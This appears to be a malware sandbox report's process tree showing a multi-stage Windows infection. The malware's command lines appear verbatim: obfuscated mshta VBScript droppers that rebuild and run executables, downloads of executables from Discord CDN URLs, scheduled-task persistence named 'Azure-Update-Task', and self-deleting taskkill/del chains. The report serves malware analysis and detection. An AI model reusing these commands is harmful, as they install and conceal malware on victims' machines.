C:\Users\Admin\AppData\Local\Temp\ED4D.exe"C:\Users\Admin\AppData\Local\Temp\ED4D.exe" --Admin IsNotAutoStart IsNotTask4⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\ED4D.exe"C:\Users\Admin\AppData\Local\Temp\ED4D.exe" --Admin IsNotAutoStart IsNotTask5⤵
-
C:\Users\Admin\AppData\Local\956bd857-068e-4075-8d9d-45eee8a11bab\build2.exe"C:\Users\Admin\AppData\Local\956bd857-068e-4075-8d9d-45eee8a11bab\build2.exe"6⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\956bd857-068e-4075-8d9d-45eee8a11bab\build2.exe"C:\Users\Admin\AppData\Local\956bd857-068e-4075-8d9d-45eee8a11bab\build2.exe"7⤵
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\956bd857-068e-4075-8d9d-45eee8a11bab\build2.exe" & del C:\ProgramData\*.dll & exit8⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im build2.exe /f9⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 69⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Local\956bd857-068e-4075-8d9d-45eee8a11bab\build3.exe"C:\Users\Admin\AppData\Local\956bd857-068e-4075-8d9d-45eee8a11bab\build3.exe"6⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\956bd857-068e-4075-8d9d-45eee8a11bab\build3.exe"C:\Users\Admin\AppData\Local\956bd857-068e-4075-8d9d-45eee8a11bab\build3.exe"7⤵
-
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"8⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\EEE4.exeC:\Users\Admin\AppData\Local\Temp\EEE4.exe2⤵
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im EEE4.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\EEE4.exe" & del C:\ProgramData\*.dll & exit3⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im EEE4.exe /f4⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 64⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Local\Temp\F250.exeC:\Users\Admin\AppData\Local\Temp\F250.exe2⤵
- Drops file in Program Files directory
-
C:\Users\Admin\AppData\Local\Temp\FB1B.exeC:\Users\Admin\AppData\Local\Temp\FB1B.exe2⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbSCRIpT: ClosE(CReateobjECT("WscRipT.SHeLl" ).rUn ( "cmD.EXE /q /r tYpe ""C:\Users\Admin\AppData\Local\Temp\FB1B.exe"" >MXb89OH1.EXE && StarT MXB89oH1.eXE /poMZbeSahrmSD~4GRjd & iF """"=="""" for %N In ( ""C:\Users\Admin\AppData\Local\Temp\FB1B.exe"" ) do taskkill /iM ""%~nXN"" -f " ,0 ,TrUE) )3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /r tYpe "C:\Users\Admin\AppData\Local\Temp\FB1B.exe" >MXb89OH1.EXE&& StarT MXB89oH1.eXE /poMZbeSahrmSD~4GRjd&iF ""=="" for %N In ( "C:\Users\Admin\AppData\Local\Temp\FB1B.exe") do taskkill /iM "%~nXN" -f4⤵
-
C:\Users\Admin\AppData\Local\Temp\MXb89OH1.EXEMXB89oH1.eXE /poMZbeSahrmSD~4GRjd5⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbSCRIpT: ClosE(CReateobjECT("WscRipT.SHeLl" ).rUn ( "cmD.EXE /q /r tYpe ""C:\Users\Admin\AppData\Local\Temp\MXb89OH1.EXE"" >MXb89OH1.EXE && StarT MXB89oH1.eXE /poMZbeSahrmSD~4GRjd & iF ""/poMZbeSahrmSD~4GRjd""=="""" for %N In ( ""C:\Users\Admin\AppData\Local\Temp\MXb89OH1.EXE"" ) do taskkill /iM ""%~nXN"" -f " ,0 ,TrUE) )6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /r tYpe "C:\Users\Admin\AppData\Local\Temp\MXb89OH1.EXE" >MXb89OH1.EXE&& StarT MXB89oH1.eXE /poMZbeSahrmSD~4GRjd&iF "/poMZbeSahrmSD~4GRjd"=="" for %N In ( "C:\Users\Admin\AppData\Local\Temp\MXb89OH1.EXE") do taskkill /iM "%~nXN" -f7⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRipt: cLosE (CREateoBJEcT ("wscRiPt.shElL"). ruN ( "cMD /q /r EcHO | SeT /p = ""MZ"" > 5XGGA_QU.T & cOpY /Y /B 5XGGA_QU.t + 7AF4K.HlZ + 8Lma.CS3 + TBFC27.HKL + G2K6.CP+ P1JSBZHT.GQ+ KYb20.A3T YfYnG.AJ & StARt msiexec.exe -y .\YFYnG.AJ ", 0, TRue ) )6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /r EcHO | SeT /p = "MZ" >5XGGA_QU.T & cOpY /Y /B 5XGGA_QU.t + 7AF4K.HlZ + 8Lma.CS3+ TBFC27.HKL+G2K6.CP+P1JSBZHT.GQ+ KYb20.A3T YfYnG.AJ & StARt msiexec.exe -y .\YFYnG.AJ7⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SeT /p = "MZ" 1>5XGGA_QU.T"8⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHO "8⤵
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe -y .\YFYnG.AJ8⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /iM "FB1B.exe" -f5⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\FDDB.exeC:\Users\Admin\AppData\Local\Temp\FDDB.exe2⤵
-
C:\Program Files (x86)\Rprqhz\tjrixg4.exe"C:\Program Files (x86)\Rprqhz\tjrixg4.exe"2⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"2⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s BITS1⤵
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService2⤵
- Drops file in System32 directory
- Checks processor information in registry
- Modifies data under HKEY_USERS
- Modifies registry class
-
C:\Windows\system32\regsvr32.exeregsvr32 /s "C:\Users\Admin\AppData\Local\Temp\490.dll"2⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Browser1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s WpnService1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Winmgmt1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s IKEEXT1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s LanmanServer1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s SENS1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s UserManager1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Themes1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ProfSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Schedule1⤵
- Drops file in System32 directory
-
C:\Users\Admin\AppData\Roaming\cbwcirjC:\Users\Admin\AppData\Roaming\cbwcirj2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"4⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
C:\Users\Admin\AppData\Roaming\cbwcirjC:\Users\Admin\AppData\Roaming\cbwcirj2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\uswcirjC:\Users\Admin\AppData\Roaming\uswcirj2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\fcwcirjC:\Users\Admin\AppData\Roaming\fcwcirj2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\fcwcirjC:\Users\Admin\AppData\Roaming\fcwcirj3⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s gpsvc1⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8213C1D5\Wed09d8d6edfaff2ac.exeWed09d8d6edfaff2ac.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\wR3As23OUq8e53mcaRA_FPuS.exe"C:\Users\Admin\Pictures\Adobe Films\wR3As23OUq8e53mcaRA_FPuS.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\0s6GO8qqgS7xOWfXxdlhB8L8.exe"C:\Users\Admin\Pictures\Adobe Films\0s6GO8qqgS7xOWfXxdlhB8L8.exe"2⤵
- Executes dropped EXE
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\210C.tmp\210D.tmp\210E.bat "C:\Users\Admin\Pictures\Adobe Films\0s6GO8qqgS7xOWfXxdlhB8L8.exe""3⤵
-
C:\Users\Admin\AppData\Local\Temp\210C.tmp\210D.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\210C.tmp\210D.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""4⤵
-
C:\Users\Admin\AppData\Local\Temp\210C.tmp\210D.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\210C.tmp\210D.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/902902974442000446/902903105925021696/18.exe" "18.exe" "" "" "" "" "" ""4⤵
-
C:\Users\Admin\AppData\Local\Temp\210C.tmp\210D.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\210C.tmp\210D.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/902902974442000446/902903166096531536/Transmissibility.exe" "Transmissibility.exe" "" "" "" "" "" ""4⤵
-
C:\Users\Admin\AppData\Local\Temp\6463\18.exe18.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\6463\Transmissibility.exeTransmissibility.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\210C.tmp\210D.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\210C.tmp\210D.tmp\extd.exe "" "" "" "" "" "" "" "" ""4⤵
-
C:\Users\Admin\Pictures\Adobe Films\67j94FgroPgh6JIk3aUx67IB.exe"C:\Users\Admin\Pictures\Adobe Films\67j94FgroPgh6JIk3aUx67IB.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Pictures\Adobe Films\67j94FgroPgh6JIk3aUx67IB.exe"C:\Users\Admin\Pictures\Adobe Films\67j94FgroPgh6JIk3aUx67IB.exe"3⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\Pictures\Adobe Films\YbWuVbqAC4SM3YjA7D7n72Oc.exe"C:\Users\Admin\Pictures\Adobe Films\YbWuVbqAC4SM3YjA7D7n72Oc.exe"2⤵
-
C:\Users\Admin\Pictures\Adobe Films\YbWuVbqAC4SM3YjA7D7n72Oc.exe"C:\Users\Admin\Pictures\Adobe Films\YbWuVbqAC4SM3YjA7D7n72Oc.exe"3⤵
-
C:\Users\Admin\Pictures\Adobe Films\MG0w73FVQVCrL19dlDkqTE0U.exe"C:\Users\Admin\Pictures\Adobe Films\MG0w73FVQVCrL19dlDkqTE0U.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Pictures\Adobe Films\MG0w73FVQVCrL19dlDkqTE0U.exe"C:\Users\Admin\Pictures\Adobe Films\MG0w73FVQVCrL19dlDkqTE0U.exe"3⤵
-
C:\Users\Admin\Pictures\Adobe Films\nmDpho0Rqwv3pDRRZHOjSsDL.exe"C:\Users\Admin\Pictures\Adobe Films\nmDpho0Rqwv3pDRRZHOjSsDL.exe"2⤵
- Loads dropped DLL
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im nmDpho0Rqwv3pDRRZHOjSsDL.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\nmDpho0Rqwv3pDRRZHOjSsDL.exe" & del C:\ProgramData\*.dll & exit3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im nmDpho0Rqwv3pDRRZHOjSsDL.exe /f4⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 64⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\Pictures\Adobe Films\kpLsXooVeYn5KXmt5cla_REP.exe"C:\Users\Admin\Pictures\Adobe Films\kpLsXooVeYn5KXmt5cla_REP.exe"2⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\Adobe Films\NQjGc9Mv6jUsTTYs2QQ03Mk5.exe"C:\Users\Admin\Pictures\Adobe Films\NQjGc9Mv6jUsTTYs2QQ03Mk5.exe"2⤵
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Documents\QUQj_70JzOWH0xslz_5jdVAu.exe"C:\Users\Admin\Documents\QUQj_70JzOWH0xslz_5jdVAu.exe"3⤵
- Checks computer location settings
-
C:\Users\Admin\Pictures\Adobe Films\lV9_TEwuM5VN8iP3KY2Rmw3n.exe"C:\Users\Admin\Pictures\Adobe Films\lV9_TEwuM5VN8iP3KY2Rmw3n.exe"4⤵
-
C:\Users\Admin\Pictures\Adobe Films\TVQZlpNkcFCBtgxDky_8XLsb.exe"C:\Users\Admin\Pictures\Adobe Films\TVQZlpNkcFCBtgxDky_8XLsb.exe"4⤵
-
C:\Users\Admin\Pictures\Adobe Films\UHFLTWpdq9qG2qWSoVixA_pf.exe"C:\Users\Admin\Pictures\Adobe Films\UHFLTWpdq9qG2qWSoVixA_pf.exe"4⤵
-
C:\Users\Admin\Pictures\Adobe Films\uphVV8ghcsrAKvTLycJGCo_b.exe"C:\Users\Admin\Pictures\Adobe Films\uphVV8ghcsrAKvTLycJGCo_b.exe"4⤵
-
C:\Users\Admin\Pictures\Adobe Films\EWnx129zDeiQSYhyoL3PSDof.exe"C:\Users\Admin\Pictures\Adobe Films\EWnx129zDeiQSYhyoL3PSDof.exe"4⤵
-
C:\Users\Admin\Pictures\Adobe Films\zB7_0GOQqQ5HH8ie1hSkX10G.exe"C:\Users\Admin\Pictures\Adobe Films\zB7_0GOQqQ5HH8ie1hSkX10G.exe"4⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\zB7_0GOQqQ5HH8ie1hSkX10G.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\Pictures\Adobe Films\zB7_0GOQqQ5HH8ie1hSkX10G.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )5⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\zB7_0GOQqQ5HH8ie1hSkX10G.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\Pictures\Adobe Films\zB7_0GOQqQ5HH8ie1hSkX10G.exe" ) do taskkill -f -iM "%~NxM"6⤵
-
C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi7⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )8⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If "/PLQtzfgO0m8dRv4iYALOqi "=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"9⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV110⤵
- Drops file in Drivers directory
- Adds Run key to start application
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpt:CLosE ( cReAteobjEcT("wscRiPt.SheLl" ). RUn ("C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE) )8⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V +1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC& Del /q *&starT msiexec -Y ..\lXQ2g.WC9⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHo "10⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"10⤵
-
C:\Windows\SysWOW64\msiexec.exemsiexec -Y ..\lXQ2g.WC10⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "zB7_0GOQqQ5HH8ie1hSkX10G.exe"7⤵
- Kills process with taskkill
-
C:\Users\Admin\Pictures\Adobe Films\twjpSfW7b7DaWXoO_nabM6tv.exe"C:\Users\Admin\Pictures\Adobe Films\twjpSfW7b7DaWXoO_nabM6tv.exe"4⤵
-
C:\Users\Admin\AppData\Local\Temp\is-VNCGP.tmp\twjpSfW7b7DaWXoO_nabM6tv.tmp"C:\Users\Admin\AppData\Local\Temp\is-VNCGP.tmp\twjpSfW7b7DaWXoO_nabM6tv.tmp" /SL5="$1044C,506127,422400,C:\Users\Admin\Pictures\Adobe Films\twjpSfW7b7DaWXoO_nabM6tv.exe"5⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-KML6A.tmp\DYbALA.exe"C:\Users\Admin\AppData\Local\Temp\is-KML6A.tmp\DYbALA.exe" /S /UID=27096⤵
- Drops file in Drivers directory
-
C:\Users\Admin\AppData\Local\Temp\a1-9cf44-50f-afda7-f231bb4006769\Tifozhakizha.exe"C:\Users\Admin\AppData\Local\Temp\a1-9cf44-50f-afda7-f231bb4006769\Tifozhakizha.exe"7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1wsxm2pk.dd4\GcleanerEU.exe /eufive & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\1wsxm2pk.dd4\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\1wsxm2pk.dd4\GcleanerEU.exe /eufive9⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\r144yedy.buz\installer.exe /qn CAMPAIGN="654" & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\r144yedy.buz\installer.exeC:\Users\Admin\AppData\Local\Temp\r144yedy.buz\installer.exe /qn CAMPAIGN="654"9⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5yeg1c0k.nzk\any.exe & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\5yeg1c0k.nzk\any.exeC:\Users\Admin\AppData\Local\Temp\5yeg1c0k.nzk\any.exe9⤵
-
C:\Users\Admin\AppData\Local\Temp\5yeg1c0k.nzk\any.exe"C:\Users\Admin\AppData\Local\Temp\5yeg1c0k.nzk\any.exe" -u10⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ef3cpd0k.oir\gcleaner.exe /mixfive & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\ef3cpd0k.oir\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\ef3cpd0k.oir\gcleaner.exe /mixfive9⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1avwnvob.ihf\autosubplayer.exe /S & exit8⤵
-
C:\Users\Admin\Pictures\Adobe Films\kz0TRXTqgY84jnr15mFDIwO1.exe"C:\Users\Admin\Pictures\Adobe Films\kz0TRXTqgY84jnr15mFDIwO1.exe"4⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=15⤵
- Loads dropped DLL
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--iUSIg"6⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x224,0x228,0x22c,0x200,0x230,0x7ffbcabcdec0,0x7ffbcabcded0,0x7ffbcabcdee07⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff664849e70,0x7ff664849e80,0x7ff664849e908⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1644,12543212647844390868,7679366567811291117,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8300_408890969" --mojo-platform-channel-handle=1664 /prefetch:87⤵
-
C:\Users\Admin\Pictures\Adobe Films\Gr7giyafFxvtrxqsfPA4BlU8.exe"C:\Users\Admin\Pictures\Adobe Films\Gr7giyafFxvtrxqsfPA4BlU8.exe"4⤵
-
C:\Users\Admin\Pictures\Adobe Films\Gr7giyafFxvtrxqsfPA4BlU8.exe"C:\Users\Admin\Pictures\Adobe Films\Gr7giyafFxvtrxqsfPA4BlU8.exe" -u5⤵
-
C:\Users\Admin\Pictures\Adobe Films\_uDVQUp1b82oTCbuhgbaREsG.exe"C:\Users\Admin\Pictures\Adobe Films\_uDVQUp1b82oTCbuhgbaREsG.exe"2⤵
-
C:\Users\Admin\Pictures\Adobe Films\AZncMKOcV3N_LXTxtk8_VdBl.exe"C:\Users\Admin\Pictures\Adobe Films\AZncMKOcV3N_LXTxtk8_VdBl.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\Pictures\Adobe Films\iTvAv769WTdgdqowmUVoPGOw.exe"C:\Users\Admin\Pictures\Adobe Films\iTvAv769WTdgdqowmUVoPGOw.exe"2⤵
-
C:\Users\Admin\Pictures\Adobe Films\pii6j3LhRjXyZzUMsP6MXCfA.exe"C:\Users\Admin\Pictures\Adobe Films\pii6j3LhRjXyZzUMsP6MXCfA.exe"2⤵
-
C:\Users\Admin\Pictures\Adobe Films\oDzI6pgLfFznDi2viuJtdUSc.exe"C:\Users\Admin\Pictures\Adobe Films\oDzI6pgLfFznDi2viuJtdUSc.exe"2⤵
- Adds Run key to start application
-
C:\Windows\SysWOW64\svchost.exesvchost.exe3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\SysWOW64\cmd.execmd /c cmd < Benvenuta.wmv3⤵
-
C:\Windows\SysWOW64\cmd.execmd4⤵
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^cumYgySQBgxPdjFKcKawUwBIsAmBYzAvcYxZIAEmtYNfVBRWjWqBCNmzERHNFdSiOXxsRGwVuTWVhjNPJDfwzYUHnqxRTQTNuGAXimtGVt$" Allora.wmv5⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comAltrove.exe.com e5⤵
